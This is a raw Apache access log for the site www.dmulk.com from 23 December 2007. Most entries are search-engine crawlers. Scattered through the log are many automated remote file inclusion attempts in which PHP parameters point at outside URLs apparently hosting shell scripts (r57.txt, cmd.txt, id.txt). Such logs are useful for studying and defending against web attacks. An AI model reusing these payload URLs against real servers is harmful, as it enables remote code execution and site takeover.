74.6.23.36 - - [23/Dec/2007:14:16:16 -0800] "GET /?D=D HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.30.179.201 - - [23/Dec/2007:14:32:45 -0800] "GET /presto/?N=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.23.211 - - [23/Dec/2007:14:38:51 -0800] "GET /logs/access_070717.log HTTP/1.0" 200 2718 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.161 - - [23/Dec/2007:14:41:33 -0800] "GET /megumi/Bracelet/?N=D HTTP/1.0" 200 1689 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.55.209.207 - - [23/Dec/2007:14:49:20 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.207 - - [23/Dec/2007:14:49:20 -0800] "GET /presto/?S=A HTTP/1.0" 200 510 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
74.6.20.21 - - [23/Dec/2007:14:50:05 -0800] "GET /megumi/Necklace/?N=A HTTP/1.0" 200 4307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.20.38 - - [23/Dec/2007:14:51:41 -0800] "GET /tmp/?D=A HTTP/1.0" 200 1491 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.29.29 - - [23/Dec/2007:15:09:14 -0800] "GET /retreat1/?M=A HTTP/1.0" 200 15065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.249.26.66 - - [23/Dec/2007:15:12:00 -0800] "GET /smarty_config.php?root_dir=http://www.emabe.com/administrator/templates/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
66.249.26.66 - - [23/Dec/2007:15:12:01 -0800] "GET /logs/smarty_config.php?root_dir=http://www.emabe.com/administrator/templates/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
66.98.216.61 - - [23/Dec/2007:15:16:00 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
66.98.216.61 - - [23/Dec/2007:15:16:00 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
74.6.23.139 - - [23/Dec/2007:15:16:58 -0800] "GET /megumi/Bracelet/?S=A HTTP/1.0" 200 1689 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [23/Dec/2007:15:23:09 -0800] "GET /presto/?D=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.119.94.66 - - [23/Dec/2007:15:39:05 -0800] "GET /index.php?redir=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
82.119.94.66 - - [23/Dec/2007:15:39:05 -0800] "GET /logs/index.php?redir=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
74.6.24.203 - - [23/Dec/2007:15:42:54 -0800] "GET /megumi/?D=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.23.17 - - [23/Dec/2007:15:45:05 -0800] "GET /retreat1/webcam/?D=A HTTP/1.0" 200 720630 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [23/Dec/2007:15:53:40 -0800] "GET /minamijewelry/dream.psd HTTP/1.0" 200 109304 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.19.162 - - [23/Dec/2007:15:55:12 -0800] "GET /bikes/dteel/140CANON/ HTTP/1.0" 200 971 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.28.157 - - [23/Dec/2007:15:57:23 -0800] "GET /bikes/dteel/140CANON/?M=A HTTP/1.0" 200 971 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.161 - - [23/Dec/2007:15:57:43 -0800] "GET /bikes/dteel/140CANON/?S=A HTTP/1.0" 200 971 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.98.216.61 - - [23/Dec/2007:15:59:09 -0800] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
66.98.216.61 - - [23/Dec/2007:15:59:09 -0800] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
74.6.26.21 - - [23/Dec/2007:15:59:59 -0800] "GET /bikes/dteel/140CANON/?N=D HTTP/1.0" 200 971 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.98.216.61 - - [23/Dec/2007:16:10:43 -0800] "GET //bbs//skin/zero_vote/error.php?dir=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
66.98.216.61 - - [23/Dec/2007:16:10:43 -0800] "GET /logs//bbs//skin/zero_vote/error.php?dir=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
62.141.56.36 - - [23/Dec/2007:16:14:49 -0800] "GET /logs/access_071215.log/start.php?s=http://killermcd.com/forum/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [23/Dec/2007:16:14:50 -0800] "GET /start.php?s=http://killermcd.com/forum/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [23/Dec/2007:16:14:50 -0800] "GET /logs/start.php?s=http://killermcd.com/forum/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:16:23:52 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:16:23:52 -0800] "GET /minamijewelry/html/about.html HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
64.26.63.10 - - [23/Dec/2007:16:24:47 -0800] "GET /logs//?mosConfig_absolute_path=http://pawang.in/r57.txt??? HTTP/1.1" 200 27524 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
64.26.63.10 - - [23/Dec/2007:16:24:47 -0800] "GET //?mosConfig_absolute_path=http://pawang.in/r57.txt??? HTTP/1.1" 200 2962 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
74.6.22.126 - - [23/Dec/2007:16:25:00 -0800] "GET /presto/?M=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.19.77 - - [23/Dec/2007:16:26:08 -0800] "GET /logs/access_071130.log HTTP/1.0" 200 58566 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.25.135 - - [23/Dec/2007:16:31:53 -0800] "GET /presto/?D=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.19.236 - - [23/Dec/2007:16:32:37 -0800] "GET /retreat1/webcam/?M=D HTTP/1.0" 200 720630 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.118 - - [23/Dec/2007:16:49:43 -0800] "GET /funny/ HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.21 - - [23/Dec/2007:16:51:21 -0800] "GET /funny/Mencanmultitask.asx HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.25.107 - - [23/Dec/2007:16:54:31 -0800] "GET /funny/?N=D HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:16:55:27 -0800] "GET /logs/access_070827.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:16:55:44 -0800] "GET /logs/access_070714.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:16:58:37 -0800] "GET /logs/access_070902.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:16:58:52 -0800] "GET /logs/access_071108.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:16:58:52 -0800] "GET /logs/access_071106.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:16:59:14 -0800] "GET /logs/access_070905.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:17:04:13 -0800] "GET /logs/ HTTP/1.1" 200 26964 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:17:04:27 -0800] "GET /logs/access_070701.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:17:04:28 -0800] "GET /logs/access_071107.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
74.6.24.113 - - [23/Dec/2007:17:11:51 -0800] "GET /logs/access_071120.log HTTP/1.0" 200 34560 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:17:37:36 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:17:40:23 -0800] "GET /logs/access_071027.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:17:42:45 -0800] "GET /logs/access_070803.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:17:44:50 -0800] "GET /logs/access_070628.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
74.6.27.48 - - [23/Dec/2007:17:54:11 -0800] "GET /megumi/earrings/?D=A HTTP/1.0" 200 2065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.144.202.123 - - [23/Dec/2007:18:00:46 -0800] "GET /logs//?pg=http://h1.ripway.com/elt/test.txt??? HTTP/1.1" 200 27524 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
202.144.202.123 - - [23/Dec/2007:18:00:47 -0800] "GET //?pg=http://h1.ripway.com/elt/test.txt??? HTTP/1.1" 200 2962 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
87.239.10.63 - - [23/Dec/2007:18:03:09 -0800] "GET /logs//install.php?install_dir=http://www.godsteam.org/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.239.10.63 - - [23/Dec/2007:18:03:09 -0800] "GET //install.php?install_dir=http://www.godsteam.org/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.242.108.82 - - [23/Dec/2007:18:11:02 -0800] "GET //administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.fishnet.pl//components/com_zoom/classes/iptc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
193.242.108.82 - - [23/Dec/2007:18:11:02 -0800] "GET /logs//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.fishnet.pl//components/com_zoom/classes/iptc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
205.234.148.64 - - [23/Dec/2007:18:14:26 -0800] "GET //administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.fishnet.pl//components/com_zoom/classes/iptc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
205.234.148.64 - - [23/Dec/2007:18:14:26 -0800] "GET /logs//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.fishnet.pl//components/com_zoom/classes/iptc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
64.34.177.135 - - [23/Dec/2007:18:15:33 -0800] "GET //administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.fishnet.pl//components/com_zoom/classes/iptc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
64.34.177.135 - - [23/Dec/2007:18:15:33 -0800] "GET /logs//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.fishnet.pl//components/com_zoom/classes/iptc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
208.53.147.60 - - [23/Dec/2007:18:19:18 -0800] "GET //administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.djspower.de/cms//components/com_forum/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
208.53.147.60 - - [23/Dec/2007:18:19:18 -0800] "GET /logs//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.djspower.de/cms//components/com_forum/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
83.170.102.103 - - [23/Dec/2007:18:22:08 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.170.102.103 - - [23/Dec/2007:18:22:08 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.170.102.103 - - [23/Dec/2007:18:22:09 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.170.102.103 - - [23/Dec/2007:18:23:30 -0800] "GET /logs/access_071215.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.50.12.32 - - [23/Dec/2007:18:28:12 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.12.32 - - [23/Dec/2007:18:28:12 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.12.32 - - [23/Dec/2007:18:28:12 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:18:28:28 -0800] "GET /logs/access_071213.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:18:28:32 -0800] "GET /logs/access_071103.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
74.50.12.32 - - [23/Dec/2007:18:30:50 -0800] "GET /logs/access_071215.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:18:30:54 -0800] "GET /logs/access_071130.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:18:31:49 -0800] "GET /logs/access_071214.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:18:31:50 -0800] "GET /logs/access_071211.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:18:32:01 -0800] "GET /logs/access_071128.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:18:35:00 -0800] "GET /logs/access_071115.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:18:35:17 -0800] "GET /logs/access_071126.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:18:35:49 -0800] "GET /logs/access_071204.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:18:38:57 -0800] "GET /logs/access_071201.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:18:39:05 -0800] "GET /logs/access_070810.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:18:39:17 -0800] "GET /logs/access_071119.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:18:39:17 -0800] "GET /logs/access_071203.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:18:39:18 -0800] "GET /logs/access_071202.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:18:42:06 -0800] "GET /logs/access_071127.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:18:42:10 -0800] "GET /logs/access_071129.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:18:42:40 -0800] "GET /logs/access_071212.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
74.6.23.35 - - [23/Dec/2007:18:45:01 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.28.17 - - [23/Dec/2007:18:45:02 -0800] "GET /logs/access_071021.log HTTP/1.0" 200 17408 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:18:45:27 -0800] "GET /logs/access_071017.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
72.36.227.10 - - [23/Dec/2007:18:46:28 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.227.10 - - [23/Dec/2007:18:46:28 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.227.10 - - [23/Dec/2007:18:46:28 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.227.10 - - [23/Dec/2007:18:47:18 -0800] "GET /logs/access_071215.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.126 - - [23/Dec/2007:18:48:47 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [23/Dec/2007:18:48:48 -0800] "GET /mobileoffice/?S=D HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.150.11.165 - - [23/Dec/2007:18:49:18 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://h1.ripway.com/elt/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
216.150.11.165 - - [23/Dec/2007:18:49:18 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://h1.ripway.com/elt/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
74.6.22.126 - - [23/Dec/2007:18:53:56 -0800] "GET /minamijewelry/flower.psd HTTP/1.0" 200 109558 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:18:54:18 -0800] "GET /logs/access_071210.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
59.106.19.57 - - [23/Dec/2007:18:57:01 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/elt/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
59.106.19.57 - - [23/Dec/2007:18:57:01 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/elt/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:19:00:23 -0800] "GET /logs/access_070921.log HTTP/1.1" 200 70813 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
202.181.99.12 - - [23/Dec/2007:19:01:35 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://h1.ripway.com/elt/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
202.181.99.12 - - [23/Dec/2007:19:01:36 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://h1.ripway.com/elt/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
74.6.24.41 - - [23/Dec/2007:19:01:47 -0800] "GET /logs/access_070816.log HTTP/1.0" 200 48263 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
59.106.19.57 - - [23/Dec/2007:19:03:32 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://h1.ripway.com/elt/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
66.249.73.36 - - [23/Dec/2007:19:04:16 -0800] "GET /logs/access_071219.log HTTP/1.1" 200 181961 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
